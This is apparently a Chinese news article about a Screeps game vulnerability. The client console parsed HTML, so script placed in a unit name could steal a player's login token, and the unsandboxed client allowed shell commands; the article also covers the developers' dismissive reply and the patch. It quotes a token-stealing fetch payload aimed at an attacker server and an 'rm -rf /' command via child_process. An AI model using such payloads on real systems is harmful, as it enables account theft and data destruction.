好评游戏BUG能让玩家电脑被黑!却遭官方回怼:菜!

你是否曾抱怨游戏里的AI太笨？Steam特别好评的独立游戏《Screeps》给了所有自认聪明的玩家一个“机会”：这游戏的单位根本没有AI，每一行行动指令都得你自己用Javascript写。

这本该是程序员的终极乐园，但最近一则爆料却让这款硬核作品变成了木马的温床。

在《Screeps》的联机世界中，玩家通过控制台查看单位日志。然而开发者为了省事，竟让控制台直接解析HTML。这意味着，如果你给自己的士兵起名叫<script>fetch(攻击者服务器...)</script>，只要对手在控制台查看了你的单位名称，你的恶意脚本就能瞬间窃取对方的登录Token。

更恐怖的是，该游戏的Steam原生客户端完全没有沙箱保护。黑客只需一行代码：nw.require('child_process').exec('rm -rf /')，就能获得受害者电脑的最高命令行权限，直接删库跑路。

面对这种史诗级安全漏洞，开发者的反应简直令人窒息。他们在GitHub上冷冷地回应：“我们不认为这是严重的威胁。”甚至辩称，如果玩家因为运行了不理解的代码而被黑，那是玩家自己的错，就像你自己把毒药吃下去一样。

直到这则爆料在社交平台X上疯传，开发者才在几小时内火速上线了补丁，却依然在官推和邮件中坚称“这从来都不是漏洞”，甚至指责爆料者是在“恶意诽谤”和“骗点击”。